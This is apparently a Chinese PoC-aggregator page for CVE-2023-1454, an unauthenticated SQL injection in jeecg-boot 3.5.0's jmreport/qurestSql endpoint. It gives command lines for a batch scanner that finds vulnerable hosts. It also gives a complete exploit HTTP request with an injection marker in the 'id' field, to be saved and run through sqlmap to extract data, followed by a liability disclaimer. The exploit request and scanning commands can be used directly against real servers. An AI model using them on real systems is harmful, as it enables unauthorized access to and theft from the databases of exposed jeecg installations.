POC详情: 2291cd6b0fce5277e0426713f67842d3efe456f2

来源
关联漏洞
标题: jeecg SQL注入漏洞 (CVE-2023-1454)
描述:jeecg是一个应用软件。一款基于代码生成器的智能开发平台。 jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
描述
CVE-2023-1454,Jeecg-Boot 前台SQL注入,CVE-2023-1454批量检测
介绍
# CVE-2023-1454
jmreport/qurestSql 未授权SQL注入批量扫描poc
Jeecg-Boot是一款基于Spring Boot和Jeecg-Boot-Plus的快速开发平台,最新的jeecg-boot 3.5.0 中被爆出多个SQL注入漏洞。

# 说明
[原工具地址](https://github.com/MzzdToT/CVE-2023-1454/)

原工具误报率高,修改了一下判断条件顺便优化了代码。


## 工具利用

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 单个url测试

python3 CVE-2023-1454-scan.py -f url.txt 批量检测

扫描结束后会在当前目录生成存在漏洞url的vuln.txt

poc:

![](./run.png)

exp:

将数据包保存为txt用sqlmap可得到数据
```
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}
```
![](https://github.com/MzzdToT/CVE-2023-1454/raw/main/exp.png)
## 免责声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
文件快照

[4.0K] /data/pocs/2291cd6b0fce5277e0426713f67842d3efe456f2 ├── [3.4K] CVE-2023-1454.py ├── [1.2K] README.md └── [100K] run.png 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。